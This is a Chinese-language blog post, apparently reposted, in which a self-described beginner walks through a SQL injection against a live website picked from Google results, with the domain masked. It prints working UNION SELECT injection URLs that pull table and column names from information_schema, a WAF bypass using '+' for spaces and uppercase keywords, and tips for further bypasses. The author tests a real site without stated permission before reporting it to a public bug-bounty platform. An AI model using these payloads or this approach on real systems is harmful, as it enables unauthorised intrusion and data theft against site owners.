一次簡單的SQL注入繞WAF


本人也是小白一枚,大佬請繞過,這個其實是六月份的時候做的,那時候想多點實戰經驗,就直接用谷歌搜索找了一些網站,這個是其中一個

1、目標網站

 

 

 

2、發現有WAF防護

 

 

3、判斷存在注入

 

 

 4、猜測了一下閉合為",果真是"閉合,而且沒有觸發WAF,但是很奇怪,后面使用函數的時候發現用',才能閉合,出現顯錯點,不知道為啥

 

 

 

 

 

 

 

 

 5、嘗試使用 order by判斷當前數據庫的字段數為20,本來以為WAF會攔截,發現也沒有攔截

 

 

 

 

 6、判斷顯示位,這次直接被攔截了

 

 

 

 

 7、繞WAF,通過使用(+)代替空格的方法繞過WAF的攔截,並大寫UNION SELECT,判斷出顯錯點為5和10

 

 

 

 

  8、查詢數據庫用戶名和數據庫名

 

 

 

 

 9、查詢當前數據庫表名,列名

查詢表名 http://www.****.com/product.php?sid=80&id=-218%27+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

+from+information_schema.tables+where+table_schema=database()+%23

 

 

 

 

 

 

查詢列名 http://www.****.com/product.php?sid=80&id=-218%27+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

+from+information_schema.columns+where+table_name=%27s1_ad1%27+limit+1,1%20+%23

 

 

 

 

 點到為止嘛沒有繼續下去了,然后直接交公益src了,其實顯錯點10也可以同顯錯點5一樣的操作查詢處庫名表名列名到最后的字段內容,還可以用group_concat()這個函數查詢出多個數據庫名,不過試了一下WAF攔截了,可以嘗試替換等價函數或者其他方法啊應該也是可以繞過WAF的,不行的話,也可以嘗試用burp抓包跑出表名,列名,字段名

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM